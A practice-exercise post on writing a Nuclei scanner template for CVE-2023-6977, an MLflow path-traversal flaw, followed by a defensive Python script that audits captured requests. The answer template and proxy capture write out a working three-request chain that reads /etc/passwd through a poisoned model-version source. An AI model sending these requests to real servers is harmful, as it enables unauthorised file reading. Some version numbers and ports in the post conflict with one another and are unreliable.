Nuclei Templates practice problem - CVE-2023-6977
Posted on 12 May 2024 at 10:28:44. Author: IIIIIIIIIIIIIIIIIIIIl

Find the cause of the vulnerability from the problem description below and write a Nuclei template for it.

Vulnerability description
This vulnerability enables malicious users to read sensitive files on the server.
Setting up the environment

apt install pipx -y
pipx ensurepath
pipx install mlflow==2.8.0
source ~/.bashrc
# mlflow takes the host and the port as separate options
mlflow ui --host 127.0.0.1 --port 5001
Answer template

id: CVE-2023-6977

info:
  name: Mlflow <2.8.0 - Local File Inclusion
  author: gy741
  severity: high
  description: |
    Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation could allow an attacker to read sensitive files on the server.
  remediation: |
    Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability.
  reference:
    - https://huntr.com/bounties/fe53bf71-3687-4711-90df-c26172880aaf
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6977
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.5
    cve-id: CVE-2023-6977
    cwe-id: CWE-29
    epss-score: 0.000840000
    epss-percentile: 0.349130000
    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: lfprojects
    product: mlflow
    shodan-query: http.title:"mlflow"
  tags: mlflow,oss,lfi,huntr,cve,cve2023,intrusive,lfprojects

http:
  - raw:
      - |
        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=utf-8

        {"name":"{{randstr}}"}

      - |
        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=utf-8

        {"name":"{{randstr}}","source":"//proc/self/root"}

      - |
        GET /model-versions/get-artifact?name={{randstr}}&path=etc%2Fpasswd&version=1 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
Attack-code analysis tips

If you put a proxy tool such as proxify between the scanner and the target, you can see the attack requests being sent as raw HTTP without having to analyze the code.

$ proxify -http-proxy http://127.0.0.1:5001 -vv

POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
Host: 127.0.0.1:8888
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 15
Content-Type: application/json
User-Agent: python-requests/2.31.0

{"name": "PoC"}

POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
Host: 127.0.0.1:8888
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 45
Content-Type: application/json
User-Agent: python-requests/2.31.0

{"name": "PoC", "source": "//proc/self/root"}

GET /model-versions/get-artifact?name=PoC&path=etc%2Fpasswd&version=1 HTTP/1.1
Host: 127.0.0.1:8888
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
User-Agent: python-requests/2.31.0
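The template's three-request chain and the proxy capture above show the same thing: the traversal is not in the `path` parameter (`etc/passwd` is a perfectly ordinary relative path) but in the `source` that the second request registers for the model version. The following is an added example, not code from this post or from the mlflow project: it parses a raw capture in the shape proxify prints, replays each request through the two checks a hardened server would make (the source must be a remote artifact URI or a local path inside the artifact store; the artifact path must stay inside that source), and reports which requests would be refused. `ARTIFACT_ROOT` and the capture are constructed for the example, and the checks illustrate the principle rather than mlflow's actual patch.

```python
"""Audit a captured MLflow request chain with defender-side checks.

Added example; not code from the post or the mlflow project. ARTIFACT_ROOT
is an assumed artifact store and CAPTURE is a constructed sample in the
raw-HTTP shape a proxy prints (not real traffic).
"""
import json
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

ARTIFACT_ROOT = "/srv/mlruns"  # assumed artifact root for this example
REMOTE_SCHEMES = {"s3", "gs", "wasbs", "abfss", "hdfs", "dbfs", "mlflow-artifacts"}

# Constructed capture: the three-request chain from the template, as a proxy shows it.
CAPTURE = """\
POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
Host: 127.0.0.1:8888
Content-Type: application/json

{"name": "PoC"}

POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
Host: 127.0.0.1:8888
Content-Type: application/json

{"name": "PoC", "source": "//proc/self/root"}

GET /model-versions/get-artifact?name=PoC&path=etc%2Fpasswd&version=1 HTTP/1.1
Host: 127.0.0.1:8888

"""

# A chunk starts at every request line; the lookahead keeps that line in the chunk.
REQ_START = r"(?m)^(?=(?:GET|POST|PUT|PATCH|DELETE) \S+ HTTP/1\.[01]$)"


def parse_requests(capture):
    """Split a raw capture into request dicts (method, path, query, headers, body)."""
    requests = []
    for chunk in re.split(REQ_START, capture):
        if not chunk.strip():
            continue
        head, _, body = chunk.partition("\n\n")
        request_line, *header_lines = head.splitlines()
        method, target, _ = request_line.split(" ", 2)
        url = urlsplit(target)
        headers = {k.strip().lower(): v.strip()
                   for k, v in (h.split(":", 1) for h in header_lines if ":" in h)}
        body = body.strip()
        try:
            body = json.loads(body) if body else None
        except json.JSONDecodeError:
            pass  # keep the raw string for non-JSON bodies
        requests.append({"method": method, "path": url.path,
                         "query": {k: v[0] for k, v in parse_qs(url.query).items()},
                         "headers": headers, "body": body})
    return requests


def source_is_allowed(source, artifact_root=ARTIFACT_ROOT):
    """A model-version source must be a remote artifact URI or a local path inside
    artifact_root. "//proc/self/root" has no scheme, so it is a local path; realpath
    collapses the leading "//" and any "..", and follows symlinks, before the check."""
    parts = urlsplit(source)
    if parts.scheme in REMOTE_SCHEMES:
        return True
    if parts.scheme not in ("", "file"):
        return False
    local = unquote(parts.path) if parts.scheme == "file" else source
    resolved = os.path.realpath(local)
    root = os.path.realpath(artifact_root)
    return resolved == root or resolved.startswith(root + os.sep)


def artifact_path_is_allowed(rel_path):
    """The get-artifact path must be relative and must not climb out of the source.
    Decoded once more here so a double-encoded "..%252F" is also caught."""
    decoded = unquote(rel_path)
    if not decoded or os.path.isabs(decoded) or decoded.startswith(("/", "\\")):
        return False
    parts = os.path.normpath(decoded).replace("\\", "/").split("/")
    return ".." not in parts


def audit(capture):
    """Walk the chain in order, remember each model version's source, and report
    which requests a hardened server would refuse and why."""
    findings = []
    sources = {}
    for r in parse_requests(capture):
        body = r["body"] if isinstance(r["body"], dict) else {}
        if r["path"].endswith("/model-versions/create"):
            src = str(body.get("source", ""))
            sources[body.get("name")] = src
            if not source_is_allowed(src):
                findings.append((r["path"], f"source outside artifact root: {src}"))
        elif r["path"].endswith("/get-artifact"):
            rel = r["query"].get("path", "")
            src = sources.get(r["query"].get("name"), "")
            if not artifact_path_is_allowed(rel):
                findings.append((r["path"], f"artifact path escapes its source: {rel}"))
            elif src and not source_is_allowed(src):
                # "etc/passwd" is a harmless relative path; the poisoned source is what
                # turns it into /etc/passwd, so a traversal filter on the path alone
                # would not have blocked this chain.
                findings.append((r["path"], f"serving {rel} from rejected source {src}"))
    return findings


if __name__ == "__main__":
    for path, why in audit(CAPTURE):
        print(f"REJECT {path}: {why}")
```

Running it flags the second and third requests of the chain and leaves the first alone. The same two checks can be dropped into a WAF rule or a log-review script: the `source` value arrives in a JSON body, so it is only visible to something that sees request bodies (a proxy or the application itself), while the `get-artifact` query string is visible in plain access logs.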